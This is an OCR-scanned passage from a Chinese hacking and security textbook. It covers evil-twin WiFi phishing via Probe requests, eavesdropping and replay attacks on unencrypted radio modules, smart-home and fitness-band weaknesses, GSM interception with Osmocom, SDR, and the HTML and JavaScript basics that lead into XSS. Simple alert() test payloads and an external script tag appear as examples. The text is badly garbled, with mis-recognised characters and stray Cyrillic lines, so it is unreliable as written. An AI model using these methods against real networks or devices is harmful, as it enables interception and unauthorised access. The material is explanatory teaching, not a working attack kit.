最 后 一 种 比较 常用 的 攻击 方式 就 是 利用 受害 者 设备 上 已 经 保存 的 热点 进行 钓鱼 攻击 。 
绝 大 多 数 WiFi 接 入 设备 都 会 日 动 连接 周边 的 能 搜索 到 的 且 名 称 已 保存 在 本 地 的 WiFi 网 络 。 
之 所 以 不 验证 热点 的 MAC 地 址 是 因为 很 多 时 候 企 业 组 网 都 会 用 大 量 同名 不 同 MAC 的 AP， 
而 终端 应 该 保证 在 这 些 AP 之 间 无 颖 切换。 但 是 这 里 就 给 了 攻击 者 可 乘 之 机 ， 即 建立 可 以 
和 目标 设备 保存 的 WiFi 同 名 的 热点 。 如 果 这 个 热点 没有 密码 ， 可 以 赁 此 轻松 对 目标 设备 
进行 中 间 人 攻击 ; 而 当 热 点 有 密码 的 时 候 ， 可 以 利用 这 个 钓鱼 热点 来 骗取 密码 (仍然 需 
要 破解 ) o 

这 种 方法 其 实 也 只 是 理论 可 行 ， 而 真正 使 其 工程 化 的 是 一 种 叫 Probe 的 机 制 。 由 于 隐 
藏 热点 的 存在 ， 同 时 为 了 提升 连接 效率 ， 许 多 移动 设备 会 主动 问 外 发 送 目 己 考虑 连接 的 热 
点 列表 ， 而 这 种 信息 在 airodump-ng 中 一 目 了 然 ， 如 图 5-15 所 示 。 

图 5-15 下 半 部 分 是 目前 网 卡 所 能 扫描 到 的 客户 端 列 表 ， 而 最 右边 一 栏 Probes 则 是 这 些 
客户 端 所 发 出 的 试探 信号 。 当 攻击 的 目标 机 发 出 了 Chinanet、CMCC 等 明显 没有 密码 的 热 
点 试探 信和 号， 或 者 知道 其 中 的 某 个 网 络 是 没有 密码 的 (例如 部 车 了 IMC Portal) 的 校园 内 
网 时 ， 就 可 以 轻易 开局 同名 热点 ， 然 后 对 大 量 客 户 端 进行 钓鱼 攻击 《客户 端 会 目 动 连 上 信 
号 最 强 的 同名 热点 ) 。 
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图 5-15 ”airodump-ng 对 Probe 的 显示 
由 于 许多 企业 都 采用 了 加 密 的 无 线 内 网 方案 ， 给 利用 无 线 网 进行 的 APT 造 成 了 障碍 ， 
此 时 如 果 能 利用 茶 一 台 会 发 送 Probe 的 客户 顺 ， 则 可 以 获取 到 密码 。 开 局 钓鱼 热点 之 后 ， 
анир бине ндыкнрүрин унй Ж, она ги один 4 


ЕД, та Е OA 界面 等 对 敏感 信 ва. | 


5.5 ”杂项 


无 线 安 全 是 一 个 非常 复杂 的 领域 。 从 广义 上 讲 ， 无 线 安全 所 包含 的 远 远 不 止 WLAN 通 
信 ， 从 电报 安全 到 4G 网 络 与 卫星 通信 安全 ， 都 可 以 归 为 无 线 安 全 的 范畴， 本 节 将 讨论 无 
线 安 全 中 WiFi 以 外 的 部 分 。 

随 看 时 代 的 发 展 ， 生 活 中 大 量 的 有 线 通信 都 转变 为 了 无 线 通 信 。 我 们 关注 的 无 线 通信 
和 无 线 安全 也 不 能 仅仅 局 限于 WiFi， 还 有 大 量 的 领域 等 待人 们 去 探索 。 

现在 除了 WiFi 外 ， 无 线 通信 主要 还 有 蓝牙 、ZigBee、DVB-T、GSM 等 很 多 种 ， 这 些 
领域 多 多 少 少 都 会 有 一 些 安全 漏洞 。 举 个 简单 的 例子 ， 国 内 的 茶 些 基于 监 牙 4.0 协 议 的 手 
环 可 以 轻松 被 黑客 控制 。 它 们 普遍 存在 工厂 调试 接口 没有 封闭 或 者 加 密 ， 以 至 于 开发 者 可 
以 轻易 截取 并 解密 接口 ， 然 后 实现 对 手 环 控制 权 的 夺取 。 有 的 手 环 甚至 对 开源 方案 的 协议 
没有 做 任何 更 改 ， 攻 击 者 只 要 看 到 品牌 就 能 对 厦 文 档 直 接 进 入 工厂 模式 并 夺取 控制 权 。 夺 
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太 大 损失 ， 但 这 些 漏洞 看 实 令 人 担 忱 。 

曾经 有 人 通过 使 用 一 个 四 轴 飞 行 右 夺取 为 一 个 四 轴 飞 行 占 的 控制 权 ， 这 就 属于 典型 
的 物 联网 透 传 的 漏洞 。 很 多 时 候 这 些 遥 控 设 备 使 用 的 并 非 是 生活 中 常见 的 通用 协议 ， 而 是 
使 用 了 低 成 本 的 nfr24101 等 蕊 片 进行 直接 通信 。 以 nrf24101p 为 例 ， 这 是 一 枚 非常 常见 的 无 
线 数 传 芯片 〈 可 以 简单 地 理解 为 不 使 用 蓝牙 /WiFi 的 无 线 串口 ) ， 它 本 身 支 持 AES 加 密 传 
输 ， 但 是 许多 开发 者 基于 性 能 考虑 或 者 干脆 就 是 因为 偷懒 而 没有 开局 这 个 功能 ， 以 至于 设 
备 和 设备 间 的 通信 可 以 轻易 被 监听 ， 甚 全 可 以 劫持 被 控 设 备 的 控制 权 。 

GSM 协 议 是 目前 世界 上 使 用 最 广 的 通信 协议 ， 但 是 它 本 身 也 有 许多 漏洞 。 这 个 协议 
可 以 说 是 很 不 安全 的 ， 它 的 很 多 漏洞 很 早 就 已 经 被 发 现 ， 但 至 今 也 没有 得 到 妥善 修复 。 有 
些 运 营 商 假设 GSM 网 络 根 本 就 没有 做 传输 加 密 处 理 ， 以 至 于 不 利用 漏洞 就 可 以 轻易 监听 
在 空中 明文 传输 的 短信 等 内 容 。 而 3G 和 4G 网 络 一 直 被 认为 是 安全 的 通信 方式 ， 可 是 前 段 
时 间 3G 网 络 也 被 攻破 了 ， 攻 击 者 也 许 是 出 于 维护 公共 网 络 安全 的 目的 并 没有 公开 攻击 方 
式 与 所 利用 的 漏洞 。4G 可 以 说 是 目前 唯一 认为 比较 安全 的 移动 通信 ，4G 网 络 中 的 应 用 层 
不 加 密 协 议 通 信 ， 被 认为 是 不 可 以 被 除 用 户 和 目 己 和 运营 商 外 第 三 方 监 听 的 。 

有 些 设备 例如 大 多 数 对 讲 机 天 生 就 不 具备 加 密 特 性 ， 它 的 所 有 通信 都 可 以 被 轻易 监 
听 ， 监 听 者 甚 全 只 需要 将 对 讲 机 调 全 同一 频段 就 能 实现 监听 。 谈 到 对 讲 就 不 得 不 说 一 个 在 
国际 安全 界 已 经 引起 注意 的 严重 问题 ， 那 就 是 机 场 塔台 与 飞机 之 间 的 通信 。 使 用 特殊 的 设 
в (其实 很 常见) 和 专门 的 软件 可 以 轻易 监听 机 场 塔台 和 飞机 之 间 的 对 讲 等 通信 ， 此 时 如 
果 发 出 干扰 信号 去 引 寻 飞机 飞 辐 错 误 的 方向 ， 很 可 能 会 引起 非常 严重 的 事故 ， 这 可 以 说 是 
一 个 真正 威胁 到 普通 民众 生命 安全 的 无 线 安全 漏洞 。 

另 一 个 长 期 受 关 注 的 主题 是 &FID 与 NFC 的 安全 。 简 单 地 说 ， 这 就 是 近 距 离 非 接触 式 
通信 的 安全 。 从 严格 意义 上 来 讲 ， 这 是 和 之 前 讲 的 无 线 安全 不 相关 的 内 容 。NFC 安 全 是 研 
究 对 各 种 加 密 或 是 不 加 密 的 卡片 进行 破解 、 复 制 、 修 改 信息 等 内 容 。NFC 在 当今 社会 大 量 
用 于 身份 验证 和 文 付 ，NFC 的 漏洞 可 以 使 攻击 者 对 物理 空间 进行 未 授权 访问 ， 或 者 去 商店 
“ 偷 ” 抹 从 小 饼干 。 


551 物 联 网 透 传 


随 独 互联 网 技术 、 无 线 通信 技术 以 及 艇 入 式 行业 的 鞍 勃 发 展 ， 智 能 家 居 渐 渐进 入 了 人 
们 的 视野 ， 各 种 智能 插座 、 家 庭 控制 中 心 在 一 次 次 的 众 筹 中 诞生 ， 但 这 些 已 经 渐渐 掌控 了 
家 庭 中 各 种 物品 控制 权 的 设备 真 的 安全 吗 ? 

先 来 谈 谈 各 种 射频 模块 。 射 频 模块 通常 被 称 为 REF 模块， 不 同 的 射频 模块 工作 在 不 同 
的 频段 。 通 常 射频 模块 使 用 目 己 的 私有 协议 ， 实 现 的 功能 可 以 简单 地 理解 为 无 线 串 口 。 但 
是 在 不 使 用 应 用 层 或 者 协议 层 的 加 密 时 ， 这 些 模块 之 间 的 通信 往往 是 不 加 密 的 ， 只 需要 有 
相同 〈 或 者 文 持 相同 协议 的 ) 模块 即 可 轻易 监听 所 有 通信 和 内容。 

以 APC220 模 块 为 例 ， 这 是 一 个 常见 的 工作 在 433MHz 频 段 的 射频 数字 信号 传输 模块 。 


АА 黑客 与 安全 技术 指南 


它 可 以 模拟 为 一 个 串口 设备 与 主 控 芯片 连接 ， 同 时 发 送 所 有 从 主 控 串口 上 接收 到 的 信息 ， 
并 且 将 自己 以 无 线 信 和 号 形式 接收 到 的 信息 使 用 串口 发 送 给 主 控 必 片 ， 实 现 多 设备 之 间 的 无 
线 数 传 。 

APC220 是 一 个 非常 优秀 的 模块 ， 功 耗 较 低 而 信号 较 强 。 两 块 APC220 可 以 间隔 几 白 米 
或 者 隔 着 好 几 堵 承重 墙 依 然 维持 稳定 的 通信 。 这 个 模块 在 通信 能 力 方 面 可 以 被 视 为 极其 优 
秀 的 ， 但 是 模块 之 间 的 通信 并 没有 被 加 密 ， 使 用 第 三 个 APC220 可 以 轻易 监听 男 外 两 个 模 
块 之 间 的 通信 。 

当 这 样 的 无 线 数 传 模块 被 应 用 到 智能 家 居中 时 就 会 产生 很 多 问题 。 例 如 现在 比较 流行 
的 智能 家 居 通 种 会 包含 射频 控制 车 库 门 开关 的 功能 ， 此 时 的 通信 内容 各 是 每 次 指令 都 一 模 
一 样 〈 非 常常 见 的 情况 ) ， 那 么 攻击 者 可 以 轻易 截取 空中 传输 的 控制 信 令 ， 从 而 进行 重 放 
攻击 ， 打 开车 库 门 ， 轻 松 对 民宅 进行 未 授权 访问 。 

假设 男 外 一 种 更 加 安全 的 情况 ， 如 果 控 制 中 心 和 车 库 门 之 间 使 用 加 密 通 信 ， 并 在 通信 
内 容 中 包含 时 间 稚 ， 那 么 这 样 的 通信 就 会 变 得 非常 难以 破解 ， 也 不 可 能 被 重 放 ， 从 而 实现 
了 对 家 性 安全 的 展 好 保护 。 

这 里 主要 是 提醒 各 位 谈 者 有 天智 能 家 居 和 智能 硬件 的 问题 ， 现 在 智能 家 居 和 智能 人 硬件 
还 属于 新 兴 行 业 ， 很 多 产品 都 处 于 不 成 熟 阶 段 ， 也 许 它 们 的 功能 很 令 人 满意 ， 但 是 它们 的 
安全 性 在 攻击 者 和 面前 却 可 能 不 堪 一 击 。 

很 多 随身 设备 也 一 样 是 不 安全 的 ， 典 型 的 是 智能 手 环 。 国 内 曾经 有 开发 者 发 现 了 茶 闭 
源 手 环 的 无 限 振 动 漏 洞 。 当 然 这 样 的 漏洞 危害 不 大 ， 而 不 会 有 什么 实际 的 危害 性 。 但 是 这 
只 是 很 普通 的 运动 记录 设备 ， 一 旦 使 用 者 佩戴 的 是 具有 人 危险 性 的 设备 ， 例 如 市 有 电击 叫 醒 
功能 的 手表 或 者 心脏 起 捕 髓 ， 这 样 的 设备 如 果 有 安全 漏洞 ， 并 且 遭 过 攻击 ， 就 可 能 对 生命 
安全 造成 严重 威胁 。 


5.5.2 移动 通信 


移动 通信 是 我 们 在 日 常生 活 中 几乎 离 不 开 的 东西 ， 从 最 早 的 寻呼机 、 大 哥 大 ， 到 现在 
文 持 LIE、WiMAX 等 4G 协 议 的 终端 设备 ， 都 在 使 用 移动 通信 。1G 网 络 早已 彻底 退役 ，1G 
网 络 被 广泛 应 用 的 那个 时 代笔 者 还 没 出 生 。2G 网 络 则 在 当今 世界 还 有 极其 广泛 的 应 用 。 
2G 网 络 可 以 分 为 FDMA〔 频 分 多 址 ， 不 同 设备 /传输 方 回 工作 在 不 同 小 频段 ， 国 内 GSM 网 
络 采 用 此 方式 ) ; ТОМА 〈 时 分 多 址 ， 将 时 间 分 为 多 个 帧 ， 设 备 在 基站 分 配 的 允许 的 时 
段 / 帧 进行 数据 发 送 或 接收 ) ; СОМА (和 码 分 多 址 ， 没 有 物理 频段 区 分 ， 只 有 逻辑 频道 ， 
基站 和 终端 使 用 信号 中 的 代码 区 分 信号 发 送 者 与 接收 方 ) 。CDMA 是 较为 安全 的 网 络 ， 而 
另外 两 种 则 漏洞 百出 。 虽 然 大 多 数 漏洞 都 已 被 封 堵 ， 但 是 仍旧 有 许多 运营 商 在 使 用 存在 漏 
洞 的 设备 ， 有 些 运营 商 甚 至 干脆 没有 对 自己 拥有 的 GSM 蜂 窜 网 络 通信 做 加 密 处 理 。 攻 击 
者 可 以 轻易 地 使 用 非常 便宜 的 设备 实现 对 短信 的 监 昕 。 如 果 攻 击 者 奶 踪 了 GSM 通 信 的 跳 
频 ， 甚 至 可 以 实时 监听 通话 。 

国外 有 一 个 在 安全 界 很 出 名 的 项 目 叫 Osmocom， 这 个 项 目 主 要 针对 GSM 做 渗透 测 
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试 。 项 目 组 开源 了 一 套 对 GSM 网 络 做 特殊 应 用 的 套件 ， 也 放出 了 一 套 能 自动 收集 当地 
GSM 网 络 安全 性 信息 的 虚拟 机 镜像 。 比 较 典 型 的 可 以 用 于 监听 的 设备 是 摩托 罗拉 的 C118/ 
C123 手 机 ， 只 要 使 用 标准 的 3.5mm 首 频 接口 串口 线 加 上 一 个 3.5mm 转 2.5mm 的 音频 转 接 
头 ， 以 及 一 个 USB 转 TTL 串 口 的 模块 ， 就 可 以 将 C118 使 用 串口 连接 到 计算 机 ， 从 而 使 用 
Osmocom 的 工具 进行 渗透 测试 。 

使 用 原版 的 C118 只 能 监听 附近 基站 指定 信道 的 GSM 通 信 ， 但 是 如 果 对 C118 中 的 某 几 
个 滤波 器 以 及 其 他 元 件 使 用 特定 的 元 件 百 换 ， 就 可 以 发 送信 号 ， 干扰 正常 的 GSM 通 信 。 
鉴于 搭建 伪 基 站 是 违法 行为 ， 本 书 中 不 对 具体 的 方法 做 解析 。 

当 你 的 GSM 手 机 受到 伪 基 站 攻击 时 会 出 现 短暂 的 信号 丢失 ， 然 后 立刻 变 得 比 之 前 正 
常 通信 的 状态 强 ， 攻 击 停止 时 也 会 出 现 短暂 的 信号 丢失 ， 之 后 信号 比 被 攻击 时 弱 。 伪 基站 
可 以 伪装 成 任何 号 码 向 你 的 手机 发 送 短信 甚至 拨打 电话 。 例 如 伪 基 站 伪装 成 银行 官方 号 码 
向 你 的 手机 发 送 诈骗 短信 ，“ 注 意 发 件 人 号 码 ” 的 技巧 将 不 再 管用 ， 你 可 能 会 轻信 短信 中 
所 陈述 的 内 容 。 

最 近 的 消息 是 3G 网 络 〈 特 指 WCDMA/ 联 通 系 ， 可 能 包括 TD/ 移 动 系 ， 不 包括 电信 /高 
通 系 的 CDMA2000) 也 可 以 被 监听 短信 ， 这 导致 我 们 对 于 移动 通信 的 可 信 度 产生 了 新 的 怀 
疑 。 也 许 在 移动 通信 中 只 有 网 络 通信 才 是 真正 安全 的 。 

对 移动 通信 感 兴趣 的 读者 可 以 研究 一 下 一 个 名 为 “OpenBTS” 的 开源 基站 程序 ， 这 个 
程序 基于 GnuRadio 运 行 ， 算 是 软件 无 线 电 的 一 种 功能 、 实 例 。 OpenBTS 文 持 常 规 频 分 多 
址 的 GSM 网 络 以 及 UMTS 制式 的 3G 通 信 。 


5.5.3 软件 无 线 电 


软件 无 线 电 是 在 当前 的 无 线 电 领 域 非常 有 用 的 设备 ， 或 者 说 是 方法 。 灿 文 名 为 SDR 
(Software Defined Radio) ， 即 软件 定义 无 线 电 。 这 个 概念 理解 起 来 非常 简单 ， 通 和 典型 
的 无 线 电 设备 ， 例 如 手机 中 的 基带 芯片 、nrfS$1822 低 功 耗 赣 牙 心 片 等 都 属于 对 无 线 通 信 协 
议 的 硬件 (固件 ) 实现 。 但 是 无 线 通信 本 身 无 非 是 在 空中 传播 的 信号 ， 所 以 软件 实现 无 线 
电 协 议 在 理论 上 是 完全 可 行 的 。Gnu Radio 是 一 套用 于 软件 无 线 电 的 工具 ， 根 据 官 网 的 说 
明 ， 就 连声 卡 都 能 用 于 软件 无 线 电 。 

现在 成 本 比较 低 的 SDR 实 现 是 用 Realtek 公 司 生 产 的 电视 棒 做 接收 器 ， 俗 称 RTL-SDR。 
一 根 Realtek 的 电视 棒 ， 通 常 仅 需 50 多 元 即 可 买 到 ， 即 便 是 被 专门 修改 过 周边 电路 以 进行 
低频 接收 的 设备 ， 也 仅仅 只 需 200 多 元 ， 最 高 能 监听 1.7GHz 的 信号 。 专 业 些 的 设备 会 比较 
贵 ， 例 如 HackRF 这 一 款 SDR 设 备 ， 价 格 将 近 2000 元 ， 但 是 可 以 收发 的 范围 也 能 达到 可 怕 
的 6GHz。 

此 处 有 一 点 非常 重要 ， 必 须 在 此 说 明 : 在 进行 不 明确 免费 民用 频段 的 SDR 研 究 时 一 定 
要 保持 彻底 沉默 地 被 动 监 听 ， 不 要 试图 主动 发 送 任何 信号 。 国 家 在 无 线 电 方面 有 很 严格 
的 管理 机 制 ， 只 人 允许 特定 的 人 《设备 ) 在 特定 的 频段 发 送 特定 范围 内 的 信号 ， 在 进行 需 
要 发 信 的 SDR 研 究 前 依照 规定 应 取得 业余 无 线 电 操 作证 书 。 平 时 我 们 使 用 的 WiFi 工 作 在 
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2.4GHz， 这 是 国家 开放 使 用 的 频段 ， 但 是 有 一 定 的 功率 限制 一 一 你 不 能 架设 一 个 功率 巨大 
的 WiFi 热 点 向 整个 县 或 是 区 域 广播 信息 。S$GHz 的 WiFi 现 在 也 是 一 个 趋势 ，802.11AC 标 准 
就 是 为 SGHz 设 定 的 。 但 是 很 多 国家 $GHz 频 段 中 的 部 分 小 频段 是 不 允许 使 用 的 ， 因 为 这 些 
频段 很 可 能 是 军用 或 者 因 其 他 原因 管制 的 。 一 些 比较 优秀 的 路 由 器 中 都 会 要 求 你 为 SG 频 
段 设 置 国家 ， 以 便 路 由 器 知道 它 所 在 的 位 置 允 许 使 用 的 频段 。 

无 线 电 通 信 有 非常 复杂 的 知识 理论 ， 篇 幅 所 限 ， 无 法 太 过 深入 。 这 里 仅 介 绍 一 些 无 线 
通信 和 领域 的 常识 ， 希 望 读者 能 对 无 线 通信 有 一 些 基 本 理解 。 

读者 也 许 思考 过 一 个 问题 ， 为 什么 U 盘 必须 插 在 计算 机 上 ? 既然 无 线 信号 能 够 传输 数 
据 ， 那 么 是 不 是 U 盘 只 要 供 上 电 ， 不 揪 在 计算 机 上 也 能 用 ? 生活 常识 告诉 我 们 ， 显 然 是 不 
能 用 。 但 是 为 什么 呢 ? 空间 中 的 信和 号 传输 是 不 稳定 的 ， 日 常生 活 中 常见 的 信号 源 都 是 低频 
信号 源 ， 所 传递 的 信息 也 是 低频 率 的 信息 。 比 如 声波 就 是 一 种 典型 的 低频 信号 。 麦 克 风 的 
原理 揭示 了 声波 可 以 直接 转换 成 同 频 的 电信 号 ， 但 是 这 样 的 电信 号 如 果 直 接 发 送 ， 由 于 频 
率 较 低 ， 即 使 经 过 功率 放大 也 非常 容易 受到 干扰 ， 几 乎 无 法 无 线 传输 。 这 时 调制 解 调 技术 
就 被 引入 到 了 无 线 传输 中 。 人 们 日 常 接触 到 的 信号 源 首先 被 数字 化 ， 全 部 转换 为 二 进 制 内 
容 ， 然 后 使 用 高 频 的 电磁 波 发 送 〈 称 为 载波 ) ， 使 得 信号 在 传输 过 程 中 所 受 的 干扰 减 小 。 
当 接 收 端 接收 到 信号 时 ， 首 先进 行 滤波 ， 滤 除 不 在 载波 频段 上 的 信号 ， 然 后 对 载波 进行 解 
调 ， 恢 复 其 中 的 数字 信息 。 这 个 过 程 其 实 包含 了 一 次 信息 丢失 ， 输 入 的 信号 例如 声音 本 质 
上 是 模拟 信号 ， 但 是 经 过 这 个 系统 的 传输 ， 转 换 成 了 数字 信和 号， 再 精细 的 数字 信号 也 会 
在 数 模 转换 的 过 程 中 导致 信息 的 丢失 。 将 这 个 原理 应 用 到 我 们 日 常 的 WiFi 通 信 中 ， 就 可 
以 把 计算 机 发 送 数 据 (精确 到 bit)〉 的 速率 理解 为 信号 本 身 的 频率 ， 而 WiFi 信 号 的 频率 为 
2.4GHz， 远 远 高 于 计算 机 发 送 的 数据 频率 。 这 也 说 明了 为 什么 SG 网 络 比 2.4G 网 络 在 理论 
上 快 许多 的 原因 ， 除 了 干扰 源 更 少 以 外 ， 同 样 重要 的 原因 是 5G 频 率 的 信号 作为 载波 能 承 
载 更 高 频率 的 原始 信号 。 
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力 可 以 说 是 极其 强大 的 。 在 这 个 万 物 趋 癌 互 联 的 世界 ， 了 解 一 些 无 线 安 全 知识 ， 做 到 心中 
有 数 ， 是 非常 重要 的 。 
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БЕН Web 2.0 的 高 速 发 展 ， 众 多 前 端 语言 也 越 来 越 多 地 出 现在 人 们 视野 中 。 短 短 几 年 
间 ，HIML5、XHTML、XML、yJavaScript 被 大 量 使 用 ， 为 用 户 提 供 更 好 的 Surfing 体 验 ， 
对 图 片 、 音 频 、 视 频 的 处 理 更 是 花样 百出 。 然 而 短 短 的 几 年 时 间 是 远 远 不 够 让 一 个 新 生 事 
物 发 展 成 熟 的 ， 而 不 成 熟 的 新 技术 中 存在 的 问题 反而 为 黑客 提供 了 契机 。 本 章 讲 解 Web 前 
端 中 的 安全 问题 。 
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下 面 介 绍 一 些 前 端 开 发 领域 中 的 常识 ， 通 过 介绍 一 些 非常 重要 的 “点 ”， 让 读者 迅速 
抓 住 学 习 重 点 。 此 外 还 需 读 者 自行 汲取 更 多 知识 ， 将 这 些 “ 点 ” 连 成 “ 线 ”， 最 终 熟 练 运 
用 ， 形 成 一 个 知识 “ 面 ”。 


6.1.1 HTML 基础 


HIML 即 超 文本 标记 语言 ， 是 构成 网 页 的 重要 框架 。 当 浏览 一 个 页 面 时 ， 浏 览 器 会 
和 目 动 解析 对 应 的 HIML 语 铝 ， 将 其 转化 为 页 面 呈现 出 来 ， 对 于 浏览 器 来 说 ， 这 个 过 程 称 为 
“解释 ”， 如 果 想 要 查看 这 些 页 面 的 HTML 代 码 ， 除 了 使 用 一 些 插件 外 ， 最 简单 的 方式 是 
直接 在 页 和 面 上 右键 选择 查看 源码 。 下 面 以 百度 前 页 为 例 ， 其 页 和 面 对 应 的 HTML 代 码 如 图 
6-1 所 示 。 
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图 6-1 百度 网 页 及 源码 
一 个 漂亮 的 网 页 ， 除 了 需要 有 HIML 以 外 ， 还 需要 有 层 登 样式 表 CSS 对 其 进行 修饰 。 有 趣 
的 是 ， 正 是 因为 CSS， 才 导致 XSS 〈 跨 站 脚本 攻击 ) 被 迫 改 名 换 姓 ， 后 面 会 详细 介绍 XSS。 
从 黑客 以 及 安全 开发 者 的 角度 来 看 ， 除 了 要 遵守 成 型 的 开发 标准 ， 还 需要 同时 学 习 
安全 开发 ， 并 从 黑客 的 角度 思考 问题 ， 培 养 安 全 意识 。 下 面 让 我 们 来 简明 扼要 地 介绍 一 下 
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HTML 和 CSS 的 基本 写法 。 
首先 ， 打 开 一 个 文本 编辑 器 〈 记 事 本 即 可 ) ， 在 其 中 输入 如 图 6-2 所 示 的 文本 ， 并 另 
存 为 一 个 .html 后 级 的 文件 ， 双 击 这 个 文件 ， 浏 览 器 会 负责 打开 它 ， 如 图 6-2 所 示 。 
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图 6-2 ”演示 HTML 页 面 ( 1 ) 

这 时 浏览 器 所 显示 的 还 是 一 个 空白 页 面 ， 这 是 因为 我 们 只 搭建 了 HTMIL 的 基本 框架 ， 
还 尚未 填充 内 容 。 来 看 一 下 已 经 写 入 的 内 容 ，<html></html> 标 签 内 是 页 面 的 主体 ， 注 意 
标签 要 成 对 出 现 。 其 中 包含 了 男 外 两 个 双 标 签 <head> 和 <body>， 从 字面 意义 就 很 容易 理 
解 ， 它 们 就 是 页 面 的 头 和 主体 ， 在 <head> 标 签 内 我 们 可 以 再 用 <title></title> 标 签 插 入 页 
面 标题 ， 也 可 以 用 <style></style> 标 签 修 饰 当前 页 面 的 样式 ， 而 <body> 标 签 内 部 可 以 插 
入 我 们 正文 的 主体 ， 例 如 标示 段落 的 <p></p> 标 签 、 区 隔 标记 <div></div> 等 。 另 外 还 有 
很 多 更 为 有 趣 的 标签 ， 正 是 这 些 标签 构成 了 精彩 的 Web 页 面 。 具 有 更 多 功能 的 标签 例如 
<h[1~6]></h[1~~6]> 可 以 标示 字体 的 大 小 ，hl 最 大 ，h6 最 小 。 下 面 我 们 简单 演示 一 下 页 面 
效果 ， 如 图 6-3 所 示 。 
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6-3 演示 HTML 页面 ( 2 ) 
从 图 6-3 可 以 看 出 ， 页 面 标题 为 “这 里 是 标题 ”， 而 页 面 也 有 了 段落 内 文本 和 字体 
为 hl 的 文本 。 除 了 双 标 签 以 外 ，HTML 还 有 一 些 所 谓 的 单 标签 也 很 常用 ， 例 如 换行 标记 
<br>、 分 割 线 <hr> 等 。 
НТМІ 内 属性 的 使 用 也 十 分 重要 ， 使 用 格式 : 
< 标签 属性 =" 属 性 "> 
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例如 : <р style="colorred">， 效 果 如 图 6-4 所 示 。 
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图 6-4 ”演示 HTML 页面 ( 3 ) 
从 图 6-4 可 以 看 出 ，style 属 性 内 定义 的 颜色 为 红色 在 页 面 中 生效 了 。 


6.1.2 使 用 JavaScript 


前 面 介绍 了 HTML， 读 者 还 需要 再 了 解 一 下 JavaScript。 在 讲解 JavaScript 之 前 ， 先 介 
绍 一 下 同 源 全 上 略 。 

同 源 策略 是 浏览 器 的 核心 策略 之 一 ， 例 如 目 行 查找 时 也 许 会 看 到 这 样 一 句 话 : 

“所 谓 同 源 是 指 域名 、 协 议 、 端 口 相同 。” 下 面 是 几 个 与 http:/www.mapers.net 是 否 同 源 

的 例子 。 

> http://mapers.net: 不 同 域 ， 域 名 不 同 ， 这 里 是 顶级 域名 。 

> https://www.mapers.net: 不 同 域 ， 协 议 不 同 ， 这 里 是 https 协 议 。 

> http://test.mapers.net: 不 同 域 ， 域 名 不 同 ，test 是 另 一 个 子 域 。 

> http://wwwmapers.net:123: 不 同 域 ， 端 口 不 同 ，123 端 口 与 80 端 口 〈 默 认 端 口 ) ЖЕ. 

> http://www.mapers.net/a/: 同 域 ， 满 足 域名 、 协 议 、 端 口 相同 。 

通俗 地 讲 ， 如 果 你 试图 通过 JavaScript 脚 本 获取 当前 页 面 的 信息 或 者 让 它 进行 你 所 期 
望 的 操作 ， 那 么 就 需要 让 脚本 在 这 个 页 面 触 发 。 

详细 介绍 JavaScript 的 编程 语法 会 占用 大 量 篇 幅 ， 这 里 只 简明 扼要 地 提出 一 些 用 于 测 
试 的 语句 和 触发 方法 。 事 实 上 在 很 多 时 候 ， 用 于 达到 目的 的 JavaScript 脚 本 在 网 上 能 大 量 
搜集 到 ， 可 以 作为 参考 。 

下 面 是 使 用 JavaScript 的 几 种 具体 方式 。 


1. 使 用 JavaScript 伪 协议 在 浏览 器 的 URL 栏 直接 触发 


在 浏览 器 URL 栏 输入 的 代码 如 图 6-5 所 示 。 

URL 栏 中 的 JavaScript 便 是 这 种 方式 的 脚本 触发 环境 ， 而 后 面 紧 跟 的 alert() 函 数 也 就 是 
弹出 人 警告 框 ， 有 些 跨 站 师 提 倡 在 测试 中 尽量 使 用 prompt()， 笔 者 也 经 历 过 针对 alert(0) 函 数 的 
过 滤 ， 却 还 是 喜欢 用 alert(0) 来 测试 。 
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图 6-5 ”在 URL 栏 执行 JavaScript 
2. 写 入 页 面 中 的 脚本 


依然 以 刚才 学 习 HTML 时 所 用 的 网 页 为 例 ， 在 代码 中 新 写 入 一 句 <body onload="alert 
(' 这 是 一 个 Onload 事 件 ') ">， 效 果 如 图 6-6 所 示 。 
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6-6 опоаа Ей Ж.ауаЗспр! 
onload 事 件 在 HIML 内 使 用 将 会 触发 其 中 的 JavaScript 函 数 执行 对 应 的 语句 。 
当然 ， 还 可 以 用 <scrip 人 标签 引入 JavaScript， 后 文 将 有 实例 说 明 。 


3. 加 载 外 部 脚本 


在 编写 网 页 的 时 候 ， 时 第 需要 插入 脚本 ， 对 于 短 的 脚本 用 前 两 种 方式 就 足够 应 付 了 ， 
如 果 脚 本 的 内 容 太 长 ， 就 不 得 不 使 用 加 载 外 部 脚本 的 方法 来 执行 ， 只 要 使 用 <scrip 全 标签 
的 src 属 性 即 可 ， 如 下 例 。 

<script src="http://www. хххх.сош/ххх"></5сирЕ> 

http://www. Xxxx.com/Xxx 指 问 一 个 JavaScript 地 址 ， 而 这 里 所 需要 做 的 只 是 指向 它 ， 
这 样 当 前 页 面 就 会 执行 这 个 JavaScript 脚 本 了 ， 关 于 这 种 用 法 后 面 还 会 用 到 。 


6.1.3 URL 地 址 的 构成 


URL 其 实 就 是 平时 大 家 所 说 的 网 址 ， 只 是 比 通常 人 们 想象 中 要 稍微 复杂 一 些 ， 一 个 标 
准 的 URL 地 址 结构 如 下 。 
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协议 名 :// 主机 地 址 [ :端口 ] / ВЕ / 1; 381 [? 查 询 ]# 信 息 片 段 


平时 我 们 所 访问 的 网 址 其 实 是 有 所 省 略 的 ， 例 如 www.baidu.com， 如 果 将 它 完 整地 写 
出 来 ， 应 该 是 http://www.baidu.com: 80/。 

由 于 浏览 器 默认 协议 为 http， 对 应 的 默认 端口 号 为 80， 故 可 以 省 略 。 但 如 果 要 访问 互 
联网 上 的 其 他 资源 ， 则 需要 加 上 协议 名 ， 如 ftp://。 

相应 地 ， 了 解 网 站 内 的 路 人 符 和 参数 也 非常 重要 ， 例 如 网 址 末尾 常见 的 /.../asp?id=x 就 是 
将 x 作 为 参数 id 的 内 容 传 入 页 面 ， 有 兴趣 的 读者 不 妨 再 去 了 解 一 下 http 请 求 、get 方 法 和 post 
方法 ， 这 些 都 是 很 有 必要 的 。 


62 了解 XSS 攻 击 


6.2.1 XSS 攻 击 原 理 


有 了 必要 知识 的 准备 ， 就 可 以 开始 了 解 现今 互联 网 中 最 难以 完全 防御 ， 也 是 和 人 的 
交互 度 最 高 的 攻击 方法 一 一 XSS (Cross-Site Scripting) 攻击 了 。XSS 即 跨 站 脚本 攻击 ， 其 
